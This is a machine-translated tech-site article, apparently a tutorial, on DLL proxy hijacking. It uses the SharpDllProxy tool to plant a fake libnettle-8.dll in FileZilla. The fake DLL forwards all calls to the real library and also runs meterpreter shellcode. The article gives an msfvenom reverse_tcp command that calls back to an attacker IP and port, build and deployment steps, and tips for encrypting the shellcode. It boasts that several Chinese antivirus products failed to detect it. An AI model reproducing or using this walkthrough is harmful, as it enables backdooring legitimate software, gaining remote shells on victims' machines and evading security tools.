Shulou(Shulou.com)05/31 Report--

How to carry out DLL proxy forwarding and weiquan analysis, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

DLL hijacking

After the Windows 7 version, the system uses KnowDLLs to manage DLL, which is located in the registry HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Session Manager\ KnownDLLs. Under this DLL file will be prohibited from calling from the directory where exe itself is located, but only from the system directory (System32) directory. But not all dll will be written to this registry, so DLL hijacking will occur.

Use the dll generated by msfvenom to kill directly.

SharpDllProxy

The name probably sounds like a socks agent. The tool comes from: https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/. The specific implementation can also refer to this boss's blog.

Preface

First understand the operation principle of dynamic link library. If application A wants to use the GetFunkyData () function in the dynamic link library DataFunctions.dll, it needs to load the DataFunctions.dll dynamic link library. For this reason, this tool creates a DataFunction.dll dynamic link library with exactly the same name, which has two functions: ① makes a shortcut key and forwards all the functions to the real dynamic link library DataFunctions.dll, which is the origin of proxy in the name; ② writes shellcode in this fake DataFunctions.dll. The original picture of the author is attached:

Experimental process

Target program

Spent some time doing this experiment, such as FileZilla software, how to find the dll that needs to be loaded? As the author said, copy out the software and you will know what he is missing. As follows:

That means that the DLL file needs to be loaded to run the modified application, so make a fake libnettle-8.dll for this DLL.

Generate shellcode

Msfvenom-a x64-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444-f raw > shell.bin

The experiment begins.

First download SharpDllProxy: https://github.com/Flangvik/SharpDllProxy, and then use visual studio 2019 to compile it, try not to use other versions, because I used visual studio 2017 all kinds of errors did not work out for a long time, there may also be environmental problems.

Directly use vs to open the SharpDllProxy under the file-- "generate solution"

Use SharpDllProxy.dll to generate a fake libnettle-8.dll. Put the shell.bin and the Dll that needs to be faked into the file shown above. Execute the following command:.\ SharpDllProxy.exe-- dll libnettle-8.dll-- payload shell.bin

The generated file contains a C file and a dll, and this dll file is the original libnettle-8.dll file.

To analyze this C language program, from lines 9 to 494 are functions that forward DLL, and forward all the functions that need to be run to the original DLL for processing.

At line 497, that's where we inserted the shellcode. The key code is only so little, in fact, you can also directly write the shell.bin shellcode to the file, reducing the number of suspicious files. Here you read it in binary and then use the VirtualAlloc memory operation to execute the shellcode. At this point, you can operate as fiercely as a tiger, using a variety of kill-free positions, such as changing the loading mode, such as encrypting shellcode and then decrypting it.

Use VS to compile the C file above. File-"New -" Project-"dynamic Link Library--" the project name is libnettle-8. Copy the above C file code into VS to compile

Send the above three files (tmpD475.dll, libnettle-8.dll, shell.bin) to the target system. Use msf snooping, then run the program, and you are back to the session.

The use of the most commonly used antivirus software: 360, velvet and security butler went undetected.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.